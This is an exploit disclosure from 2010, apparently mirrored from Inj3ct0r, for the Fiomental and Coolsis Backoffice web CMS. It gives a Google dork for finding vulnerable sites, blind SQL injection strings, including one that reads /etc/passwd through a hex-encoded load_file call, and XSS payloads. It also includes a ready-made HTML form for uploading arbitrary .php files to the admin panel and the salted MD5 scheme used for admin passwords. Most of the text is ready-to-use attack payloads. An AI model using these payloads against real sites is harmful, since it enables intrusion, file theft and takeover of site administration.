Home / os / win7

Fiomental & Coolsis Backoffice Multi Vulnerability

Posted on 10 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Fiomental &amp; Coolsis Backoffice Multi Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================== Fiomental &amp; Coolsis Backoffice Multi Vulnerability ================================================== ______ _ _ _ | ___ | | | | (_) | |_/ /_____ _____ | |_ _| |_ _ ___ _ __ | // _ / / _ | | | | | __| |/ _ | '_ | | __/ V / (_) | | |_| | |_| | (_) | | | | \_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| _____ _____ _____ |_ _| | _ || _ | | | ___ __ _ _ __ ___ | |/' || |_| | | |/ _ / _` | '_ ` _ | /| |\____ | | | __/ (_| | | | | | | |_/ /.___/ / \_/\___|\__,_|_| |_| |_| \___/ \____/ DEFACEMENT it's for script kiddies... _____________________________________________________________ [$] Exploit Title : Fiomental &amp; Coolsis Backoffice Multi Vulnerability [$] Date : 10-05-2010 [$] Author : MasterGipy [$] Email : mastergipy [at] gmail.com [$] Bug : Multi Vulnerability [$] Site : http://www.fiomental.com/ [$] Demo : http://www.fiomental.com/modelo/ [$] Google Dork : &quot;Desenvolvido por: Fio Mental&quot; or &quot;Desenvolvido por: coolsis&quot; [%] vulnerable file: index.php [BLIND SQL INJECTION] [$] Exploit: [+] http://example.pt/?cod=1 &lt;- SQL [+] sql_1: -1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10 and '1'='1 [+] sql_2: -1' UNION ALL SELECT 1,2,3,load_file(0x2F6574632F706173737764),5,6,7,8,9,10 and '1'='1 [XSS] [+] http://example.pt/index.php/&gt;&quot;&gt;&lt;script&gt;alert(/LOL/)&lt;/script&gt; [%] vulnerable file: /admin/index2.php [REMOTE ARBITRARY UPLOAD VULNERABILITY] [$] Exploit: &lt;html&gt; &lt;form action=&quot;http://&lt;-- CHANGE HERE --&gt;/admin/index2.php?sc=up1&amp;ac=a1&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot; name=&quot;form1&quot;&gt; &lt;p align=&quot;center&quot;&gt; &lt;input name=&quot;ficheiro&quot; type=&quot;file&quot; class=&quot;file&quot; id=&quot;ficheiro&quot;&gt; &lt;input name=&quot;ok&quot; type=&quot;submit&quot; class=&quot;button&quot; id=&quot;ok&quot; value=&quot;OK&quot;&gt; &lt;/p&gt; &lt;p align=&quot;center&quot;&gt;(only gif png jpg are allowed) &lt;/p&gt; &lt;p align=&quot;center&quot;&gt;Files go to:&amp;nbsp; http://example.pt/uploads/your_file.php.png&lt;/p&gt; &lt;/form&gt; &lt;/html&gt; [XSS] [$] http://example.pt/admin/index2.php?&amp;cod=1&amp;ac=a1&amp;tituloSc=&lt;script&gt;alert(/LOL/)&lt;/script&gt; (you need to login for this one) [%] EXTRA: [$] Admin Panel Password Algorithm &lt;?php $login = &quot;test&quot;; $pass = &quot;test&quot;; $total = md5(($login . 'fiomental').(md5($pass))); // md5($salt.md5($pass) echo &quot;$total&quot;; // This will Print the password Hash. ?&gt; [§] Greetings from PORTUGAL ^^ # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP